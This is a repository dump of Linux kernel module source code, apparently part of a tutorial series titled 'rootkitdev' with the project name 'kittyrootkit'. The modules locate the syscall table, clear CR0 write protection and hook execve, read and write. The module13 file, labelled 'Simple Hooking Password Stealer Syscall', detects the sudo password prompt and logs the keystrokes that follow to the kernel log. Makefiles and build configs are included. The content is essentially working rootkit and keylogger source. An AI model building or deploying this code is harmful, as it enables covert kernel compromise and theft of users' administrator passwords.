Argz [255] = {'\0'};; 107 | 108 | 109 | 110 | 111 | /* from: /usr/src/linux-headers-$(uname -r)/include/linux/syscalls.h */ 112 | asmlinkage int (*origional_execve)(const char *filename, char *const argv[], char *const envp[]); 113 | asmlinkage int HookExecve(const char *filename, char *const argv[], char *const envp[]) { 114 | 115 | copy_from_user(&CharBuffer , filename , strnlen_user(filename , sizeof(CharBuffer) - 1 ) ); 116 | printk( KERN_INFO "Executable Name %s \n", CharBuffer ); 117 | 118 | char * ptr = 0xF00D; 119 | 120 | // Since we don't know the count of args we go until the 0 arg. 121 | // We will collect 20 args maximum. 122 | // 123 | 124 | for (int i = 0 ; i < 20 ; i++){ 125 | if(ptr){ 126 | int success = copy_from_user(&ptr, &argv[i], sizeof(ptr)); 127 | // Check for ptr being 0x00 128 | if(success == 0 && ptr){ 129 | //printk( KERN_INFO "Pointer Name %px \n", ptr ); 130 | strncpy_from_user(Argz, ptr , sizeof(Argz)); 131 | printk( KERN_INFO "Args %s \n", Argz ); 132 | memset(Argz, 0 ,sizeof(Argz)); 133 | 134 | } 135 | } 136 | } 137 | // We need to check if SUDO is called. 138 | if( strcmp(CharBuffer , "/usr/bin/sudo" ) == 0 ){ 139 | printk( KERN_INFO "Sudo Executed! "); 140 | 141 | } 142 | 143 | 144 | 145 | 146 | 147 | 148 | return (*origional_execve)(filename, argv, envp); 149 | } 150 | 151 | 152 | 153 | //TODO ssize_t write(int fd, const void *buf, size_t count); 154 | // TODO check if write syscall containes the following: 155 | // TODO "[sudo] password for" 156 | 157 | 158 | 159 | 160 | asmlinkage int (*original_read)(unsigned int, void __user*, size_t); 161 | asmlinkage int HookRead(unsigned int fd, void __user* buf, size_t count) { 162 | //printk(KERN_INFO "READ HOOKED HERE! -- This is our function!"); 163 | 164 | //TODO Read if buffer one byte until byte == \n 165 | 166 | return (*original_read)(fd, buf, count); 167 | } 168 | 169 | 170 | 171 | 172 | 173 | 174 | static int __init SetHooks(void) { 175 | // Gets Syscall Table ** 176 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 177 | 178 | printk(KERN_INFO "Hooks Will Be Set.\n"); 179 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 180 | 181 | 182 | EnablePageWriting(); 183 | 184 | // Replaces Pointer Of Syscall_read on our syscall. 185 | 186 | 187 | 188 | // KEEP THIS ORDER!!! 189 | // CRASH WILL HAPPEN 190 | original_read = (void*)SYS_CALL_TABLE[__NR_read]; 191 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)HookRead; 192 | 193 | origional_execve = (void*)SYS_CALL_TABLE[__NR_execve]; 194 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)HookExecve; 195 | 196 | DisablePageWriting(); 197 | 198 | return 0; 199 | } 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | static void __exit HookCleanup(void) { 208 | 209 | // Clean up our Hooks 210 | EnablePageWriting(); 211 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)original_read; 212 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)origional_execve; 213 | DisablePageWriting(); 214 | 215 | printk(KERN_INFO "HooksCleaned Up!"); 216 | } 217 | 218 | module_init(SetHooks); 219 | module_exit(HookCleanup); -------------------------------------------------------------------------------- /module11_Hooking_execve/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module11_Hooking_execve/main.o-.text-1c9 2 | /home/krash/works/rootkitdev/module11_Hooking_execve/main.o-.text-1d9 3 | /home/krash/works/rootkitdev/module11_Hooking_execve/main.o-.text-1f9 4 | /home/krash/works/rootkitdev/module11_Hooking_execve/main.o-.text-209 5 | -------------------------------------------------------------------------------- /module12_Hooking_execve_altercmd/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module12_Hooking_execve_altercmd/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module12_Hooking_execve_altercmd/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | #include 13 | #include 14 | 15 | MODULE_LICENSE("GPL"); 16 | MODULE_AUTHOR("SourceCodeDeleted"); 17 | 18 | // Special thanks to sticksxo 19 | 20 | MODULE_DESCRIPTION("Simple Hooking Password Stealer Syscall"); 21 | MODULE_VERSION("1.0"); 22 | 23 | 24 | unsigned long **SYS_CALL_TABLE; 25 | 26 | 27 | void EnablePageWriting(void){ 28 | write_cr0(read_cr0() & (~0x10000)); 29 | 30 | } 31 | void DisablePageWriting(void){ 32 | write_cr0(read_cr0() | 0x10000); 33 | 34 | } 35 | 36 | // EXECVE STRACE 37 | 38 | /* 39 | 40 | # sudo strace -u myusername sudo -k pwd 41 | execve("/bin/ls", ["ls", "-l"], 0x7ffc804d9e98 ) = 0 42 | execve("/usr/bin/sudo", ["sudo", "-k", "pwd"], 0x7ffdff5fec50 24 vars ) = 0 43 | access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) 44 | 45 | */ 46 | char char_buffer[255] = {0}; 47 | // Note: Do not name variables similar, especially globals. 48 | // The argc <-> argz <-> argv differ only in one char. 49 | // and 2d array to hold arguments strings 50 | char argz[255][255] = {0}; 51 | // the count of arguments 52 | size_t argc = 0; 53 | 54 | char CharBuffer [255] = {'\0'}; 55 | char Argz [255] = {'\0'};; 56 | 57 | 58 | unsigned int RealCount = 0; 59 | 60 | /* from: /usr/src/linux-headers-$(uname -r)/include/linux/syscalls.h */ 61 | 62 | 63 | 64 | 65 | asmlinkage int (*origional_execve)(const char *filename, char *const argv[], char *const envp[]); 66 | asmlinkage int HookExecve(const char *filename, char *const argv[], char *const envp[]) { 67 | 68 | copy_from_user(&CharBuffer , filename , strnlen_user(filename , sizeof(CharBuffer) - 1 ) ); 69 | printk( KERN_INFO "Executable Name %s \n", CharBuffer ); 70 | 71 | char * ptr = 0xF00D; 72 | 73 | // Since we don't know the count of args we go until the 0 arg. 74 | // We will collect 20 args maximum. 75 | // 76 | 77 | for (int i = 0 ; i < 20 ; i++){ 78 | if(ptr){ 79 | 80 | int success = copy_from_user(&ptr, &argv[i], sizeof(ptr)); 81 | // Check for ptr being 0x00 82 | if(success == 0 && ptr){ 83 | RealCount ++; 84 | 85 | //printk( KERN_INFO "Pointer Name %px \n", ptr ); 86 | strncpy_from_user(Argz, ptr , sizeof(Argz)); 87 | printk( KERN_INFO "Args %s \n", Argz ); 88 | memset(Argz, 0 ,sizeof(Argz)); 89 | 90 | 91 | 92 | } 93 | } 94 | } 95 | printk("RealCount %d\n", RealCount); 96 | RealCount = 0; 97 | argc = RealCount + 1; 98 | 99 | 100 | // for(int i = 0 ; i < argc; i++){ 101 | // Insert ARGS here. 102 | 103 | 104 | // } 105 | 106 | 107 | 108 | 109 | return (*origional_execve)(filename, argv, envp); 110 | } 111 | 112 | 113 | 114 | //TODO ssize_t write(int fd, const void *buf, size_t count); 115 | // TODO check if write syscall containes the following: 116 | // TODO "[sudo] password for" 117 | 118 | 119 | 120 | 121 | asmlinkage int (*original_read)(unsigned int, void __user*, size_t); 122 | asmlinkage int HookRead(unsigned int fd, void __user* buf, size_t count) { 123 | //printk(KERN_INFO "READ HOOKED HERE! -- This is our function!"); 124 | 125 | //TODO Read if buffer one byte until byte == \n 126 | 127 | return (*original_read)(fd, buf, count); 128 | } 129 | 130 | 131 | 132 | 133 | 134 | 135 | static int __init SetHooks(void) { 136 | // Gets Syscall Table ** 137 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 138 | 139 | printk(KERN_INFO "Hooks Will Be Set.\n"); 140 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 141 | 142 | 143 | EnablePageWriting(); 144 | 145 | // Replaces Pointer Of Syscall_read on our syscall. 146 | 147 | 148 | 149 | // KEEP THIS ORDER!!! 150 | // CRASH WILL HAPPEN 151 | original_read = (void*)SYS_CALL_TABLE[__NR_read]; 152 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)HookRead; 153 | 154 | origional_execve = (void*)SYS_CALL_TABLE[__NR_execve]; 155 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)HookExecve; 156 | 157 | DisablePageWriting(); 158 | 159 | return 0; 160 | } 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | static void __exit HookCleanup(void) { 169 | 170 | // Clean up our Hooks 171 | EnablePageWriting(); 172 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)original_read; 173 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)origional_execve; 174 | DisablePageWriting(); 175 | 176 | printk(KERN_INFO "HooksCleaned Up!"); 177 | } 178 | 179 | module_init(SetHooks); 180 | module_exit(HookCleanup); -------------------------------------------------------------------------------- /module12_Hooking_execve_altercmd/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module12_Hooking_execve_altercmd/main.o-.text-1d9 2 | /home/krash/works/rootkitdev/module12_Hooking_execve_altercmd/main.o-.text-1e9 3 | /home/krash/works/rootkitdev/module12_Hooking_execve_altercmd/main.o-.text-209 4 | /home/krash/works/rootkitdev/module12_Hooking_execve_altercmd/main.o-.text-219 5 | -------------------------------------------------------------------------------- /module13_Hooking_SyscallRead_Keylogger/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module13_Hooking_SyscallRead_Keylogger/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module13_Hooking_SyscallRead_Keylogger/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | #include 13 | #include 14 | 15 | MODULE_LICENSE("GPL"); 16 | MODULE_AUTHOR("SourceCodeDeleted"); 17 | 18 | // Special thanks to sticksxo 19 | 20 | MODULE_DESCRIPTION("Simple Hooking Password Stealer Syscall"); 21 | MODULE_VERSION("1.0"); 22 | 23 | 24 | unsigned long **SYS_CALL_TABLE; 25 | 26 | 27 | void EnablePageWriting(void){ 28 | write_cr0(read_cr0() & (~0x10000)); 29 | 30 | } 31 | void DisablePageWriting(void){ 32 | write_cr0(read_cr0() | 0x10000); 33 | 34 | } 35 | 36 | // EXECVE STRACE 37 | 38 | /* 39 | 40 | # sudo strace -u myusername sudo -k pwd 41 | execve("/bin/ls", ["ls", "-l"], 0x7ffc804d9e98 ) = 0 42 | execve("/usr/bin/sudo", ["sudo", "-k", "pwd"], 0x7ffdff5fec50 24 vars ) = 0 43 | access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) 44 | 45 | ... 46 | ... 47 | ... 48 | write(4, "[sudo] password for myusername: ", 27[sudo] password for myusername: ) = 27 49 | write(4, "*", 1*) = 1 50 | read(4, "s", 1) = 1 51 | write(4, "*", 1*) = 1 52 | read(4, "d", 1) = 1 53 | write(4, "*", 1*) = 1 54 | read(4, "d", 1) = 1 55 | write(4, "*", 1*) = 1 56 | read(4, "a", 1) = 1 57 | write(4, "*", 1*) = 1 58 | read(4, "s", 1) = 1 59 | write(4, "*", 1*) = 1 60 | read(4, "d", 1) = 1 61 | write(4, "*", 1*) = 1 62 | read(4, "\n", 1) = 1 63 | write(4, "\10 \10", ) = 3 64 | write(4, "\10 \10", ) = 3 65 | write(4, "\10 \10", ) = 3 66 | write(4, "\10 \10", ) = 3 67 | write(4, "\10 \10", ) = 3 68 | write(4, "\10 \10", ) = 3 69 | write(4, "\10 \10", ) = 3 70 | write(4, "\10 \10", ) = 3 71 | alarm(0) = 0 72 | write(4, "\n", 1 73 | ) = 1 74 | ... 75 | ... 76 | ... 77 | openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 4 78 | 79 | 80 | */ 81 | /* 82 | 83 | Table 1. The User Space Memory Access API 84 | Function Description 85 | access_ok Checks the validity of the user space memory pointer 86 | get_user Gets a simple variable from user space 87 | put_user Puts a simple variable to user space 88 | clear_user Clears, or zeros, a block in user space 89 | copy_to_user Copies a block of data from the kernel to user space 90 | copy_from_user Copies a block of data from user space to the kernel 91 | strnlen_user Gets the size of a string buffer in user space 92 | strncpy_from_user Copies a string from user space into the kernel 93 | */ 94 | 95 | 96 | char char_buffer[255] = {0}; 97 | // Note: Do not name variables similar, especially globals. 98 | // The argc <-> argz <-> argv differ only in one char. 99 | // and 2d array to hold arguments strings 100 | char argz[255][255] = {0}; 101 | // the count of arguments 102 | size_t argc = 0; 103 | 104 | 105 | char CharBuffer [255] = {'\0'}; 106 | char Argz [255] = {'\0'};; 107 | 108 | 109 | 110 | 111 | /* from: /usr/src/linux-headers-$(uname -r)/include/linux/syscalls.h */ 112 | asmlinkage int (*origional_execve)(const char *filename, char *const argv[], char *const envp[]); 113 | asmlinkage int HookExecve(const char *filename, char *const argv[], char *const envp[]) { 114 | 115 | copy_from_user(&CharBuffer , filename , strnlen_user(filename , sizeof(CharBuffer) - 1 ) ); 116 | //printk( KERN_INFO "Executable Name %s \n", CharBuffer ); 117 | 118 | char * ptr = 0xF00D; 119 | 120 | // Since we don't know the count of args we go until the 0 arg. 121 | // We will collect 20 args maximum. 122 | // 123 | 124 | for (int i = 0 ; i < 20 ; i++){ 125 | if(ptr){ 126 | int success = copy_from_user(&ptr, &argv[i], sizeof(ptr)); 127 | // Check for ptr being 0x00 128 | if(success == 0 && ptr){ 129 | //printk( KERN_INFO "Pointer Name %px \n", ptr ); 130 | strncpy_from_user(Argz, ptr , sizeof(Argz)); 131 | // printk( KERN_INFO "Args %s \n", Argz ); 132 | memset(Argz, 0 ,sizeof(Argz)); 133 | 134 | } 135 | } 136 | 137 | } 138 | // We need to check if SUDO is called. 139 | if( strcmp(CharBuffer , "/usr/bin/sudo" ) == 0 ){ 140 | printk( KERN_INFO "Sudo Executed! "); 141 | 142 | } 143 | 144 | 145 | 146 | 147 | 148 | 149 | return (*origional_execve)(filename, argv, envp); 150 | } 151 | 152 | 153 | 154 | //TODO ssize_t write(int fd, const void *buf, size_t count); 155 | // TODO check if write syscall containes the following: 156 | // TODO "[sudo] password for" 157 | 158 | 159 | 160 | char Password [255]; 161 | bool KeyLogger = 0; 162 | 163 | unsigned int TOTALREADCOUNT = 0; 164 | 165 | asmlinkage int (*original_read)(unsigned int fd, const char __user* buffer, size_t count); 166 | asmlinkage int HookRead (unsigned int fd, const char __user* buffer, size_t count) { 167 | //printk(KERN_INFO "READ HOOKED HERE! -- This is our function!"); 168 | // READ works by reading a buffer. So technically the buffer isn't populated until the retn is complete. 169 | int ret = (*original_read)(fd, buffer, count); 170 | 171 | 172 | if (ret == 1 && TOTALREADCOUNT < 200){ // Too much to read . Too dangerous to run. 173 | 174 | long unsigned int Ucount = count; 175 | long unsigned int Ufd = fd; 176 | char Letter = ""; 177 | 178 | 179 | if (Ufd == 4 && Ucount == 1){ 180 | 181 | get_user(Letter , buffer); 182 | Password[0] = Letter; 183 | 184 | char * pPassword = Password; 185 | printk("Password %ld | %s | %ld \n" ,Ufd ,pPassword, Ucount); 186 | TOTALREADCOUNT ++; 187 | } 188 | } 189 | 190 | 191 | 192 | 193 | return ret; 194 | } 195 | 196 | 197 | 198 | asmlinkage int (*original_write)(unsigned int fd, const char __user * buffer , size_t nbytes); 199 | asmlinkage int HookWrite (unsigned int fd, const char __user * buffer , size_t nbytes){ 200 | 201 | char * sudoprompt = "[sudo] password for"; 202 | char Message [255] = {'\0'}; 203 | long unsigned int Unbytes = nbytes; 204 | 205 | char CharCheck = ""; 206 | if(Unbytes == 27 ){ 207 | //printk("Password is being Typed? %ld \n", Unbytes); 208 | copy_from_user(&Message , buffer , 27 ); 209 | //printk("Message : %s \n" , Message); 210 | memset (Message , 0 , sizeof(Message)); 211 | 212 | for (int i = 0 ; i < 19 ; i++ ){ // Length of "[sudo] password for" 213 | get_user(CharCheck , buffer+i); 214 | Message[i] = CharCheck; 215 | 216 | } 217 | // printk("Message : %s \n" , Message); 218 | // memset (Message , 0 , sizeof(Message)); 219 | char * pMessage = Message; 220 | if( strcmp(sudoprompt, pMessage) == 0){ 221 | printk("[+] Sudo Prompt Detected! Starting Logger!\n"); 222 | 223 | //printk("Message : %s \n" , Message); 224 | memset (Message , 0 , sizeof(Message)); 225 | //KeyLogger = true; 226 | 227 | 228 | } 229 | 230 | 231 | // get_user(CharCheck , buffer); 232 | // char * pCharCheck = CharCheck; 233 | // if(strcmp(pCharCheck, Astrisk) == 0 ){ 234 | // printk("Password is being Typed? \n"); 235 | 236 | 237 | // } 238 | // get_user(CharCheck , buffer); 239 | // if(CharCheck > 0x32 && CharCheck < 0x7a){ 240 | // copy_from_user(&Message , buffer , sizeof(buffer) ); 241 | // printk("Message : %s\n" , Message); 242 | // memset (Message , 0 , sizeof(Message)); 243 | 244 | } 245 | 246 | 247 | return (*original_write)(fd, buffer , nbytes); 248 | 249 | } 250 | 251 | 252 | 253 | 254 | static int __init SetHooks(void) { 255 | // Gets Syscall Table ** 256 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 257 | 258 | printk(KERN_INFO "Hooks Will Be Set.\n"); 259 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 260 | 261 | 262 | EnablePageWriting(); 263 | 264 | // Replaces Pointer Of Syscall_read on our syscall. 265 | 266 | 267 | 268 | // KEEP THIS ORDER!!! 269 | // CRASH WILL HAPPEN 270 | original_read = (void*)SYS_CALL_TABLE[__NR_read]; 271 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)HookRead; 272 | 273 | original_write = (void*)SYS_CALL_TABLE[__NR_write]; 274 | SYS_CALL_TABLE[__NR_write] = (unsigned long*)HookWrite; 275 | 276 | origional_execve = (void*)SYS_CALL_TABLE[__NR_execve]; 277 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)HookExecve; 278 | 279 | DisablePageWriting(); 280 | 281 | return 0; 282 | } 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | static void __exit HookCleanup(void) { 291 | 292 | // Clean up our Hooks 293 | EnablePageWriting(); 294 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)original_read; 295 | SYS_CALL_TABLE[__NR_write] = (unsigned long*)original_write; 296 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)origional_execve; 297 | DisablePageWriting(); 298 | 299 | printk(KERN_INFO "HooksCleaned Up!"); 300 | } 301 | 302 | module_init(SetHooks); 303 | module_exit(HookCleanup); -------------------------------------------------------------------------------- /module13_Hooking_SyscallRead_Keylogger/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module12_Hooking_SyscallRead_Keylogger/main.o-.text-359 2 | /home/krash/works/rootkitdev/module12_Hooking_SyscallRead_Keylogger/main.o-.text-369 3 | /home/krash/works/rootkitdev/module12_Hooking_SyscallRead_Keylogger/main.o-.text-389 4 | /home/krash/works/rootkitdev/module12_Hooking_SyscallRead_Keylogger/main.o-.text-399 5 | --------------------------------------------------------------------------------